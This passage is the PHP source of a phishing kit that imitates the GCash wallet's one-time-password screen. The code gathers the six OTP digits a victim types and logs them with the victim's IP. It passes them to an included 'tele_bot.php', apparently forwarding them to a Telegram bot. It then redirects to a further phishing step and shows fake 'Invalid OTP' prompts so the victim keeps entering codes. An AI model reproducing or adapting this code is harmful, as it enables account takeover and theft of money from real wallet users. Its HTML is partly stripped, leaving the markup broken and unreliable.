$ip \n\n$numotp"; include('Gcash_files/tele_bot.php'); $encodenumotp = base64_encode(base64_encode($numotp)); header("Location:telegram-otp2.php?number=$numotp&otp=$num"); } } } else if(preg_match("/^(09)\\d{9}/", $num)){ if(isset($_POST['submitotp'])){ if(!empty($_POST['otp'])){ $numotp = $_POST['otp'].$_POST['otp1'].$_POST['otp2'].$_POST['otp3'].$_POST['otp4'].$_POST['otp5']; $replyMsg = "Logged => $ip \n\n$numotp"; include('Gcash_files/tele_bot.php'); $encodenumotp = base64_encode(base64_encode($numotp)); header("Location:telegram-otp2.php?number=$numotp&otp=$num"); } } } else{ } if(empty($_GET['otpclid'])){ } if(isset($_GET['resendotp'])){ $replyMsg = "Logged => $ip \n\nResend OTP"; } echo ' GCash OTP '; echo " "; echo '


We sent a 6-digit authentication code
to your registered mobile number

'; echo "" .$number. '
'; echo '

'; echo ' Please enter the authentication code.

'; echo '
'; if ($_GET['inv'] == '1') { echo 'Invalid OTP Please try again.

'; } ;'


'; echo " Didn't get code? Tap here to resend


'; ?>